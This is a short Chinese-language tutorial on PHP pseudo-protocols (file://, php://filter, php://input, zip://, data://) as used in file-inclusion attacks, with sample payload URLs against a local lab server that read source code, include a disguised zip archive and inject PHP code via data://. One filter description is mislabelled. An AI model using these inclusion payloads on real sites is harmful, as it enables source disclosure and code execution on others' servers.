PHP伪协议

PHP伪协议（pseudo-protocol）是一种在PHP中用作文件访问的特殊机制。它允许通过“伪协议”指定一个处理方式来处理特定的文件或数据。

file://协议：用于访问和操作本地文件系统中的文件。

allow_url_fopen ：off/on

allow_url_include：off/on

file://协议通常要求使用绝对路径。路径需要是完整的、从根目录开始的。

http://127.0.0.1/index.php?a=file://D:\phpstudy\phpstudy_pro\WWW\web.php

php://filter协议：用于在读取或写入数据流时应用过滤器。这使得你可以在数据流通过文件系统或其他数据源之前或之后进行处理，如编码、解码、加密、解密等。

allow_url_fopen ：off/on

allow_url_include：off/on

过滤器可以应用于读取流read和写入流write。你可以在读取数据时应用过滤器，也可以在写入数据时应用过滤器。

常用过滤器

string.toupper：将字符串转换为大写

string.tolower：将字符串转换为小写

string.strip_tags：移除 HTML 和 PHP 标签

string.urlencode：对字符串进行 URL 编码

string.base64encode：对字符串进行 URL 编码

http://127.0.0.1/index.php?a=php://filter/read=convert.base64-encode/resource=web.php

php://input协议：提供了一个只读的流，允许你访问请求体中的原始数据，特别适用于处理原始的 POST 请求体。

allow_url_fopen ：off/on

allow_url_include：on

 

zip://, bzip2://, zlib://协议：允许直接访问压缩文件的内容，不需要指定后缀名。

zip://, bzip2://, zlib://协议在双off的情况下也可以正常使用；

allow_url_fopen ：off/on

allow_url_include：off/on

http://127.0.0.1/index.php?a=zip://web.zip%23web.php

 http://127.0.0.1/index.php?a=zip://web.jpg%23web.php

data://协议：用于在 URL 中嵌入小型的数据。它允许直接在 URL 中包含数据

allow_url_fopen ：on

allow_url_include：on

http://127.0.0.1/index.php?a=data://text/plain,<?php phpinfo();?>

 http://127.0.0.1/index.php?a=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4%3D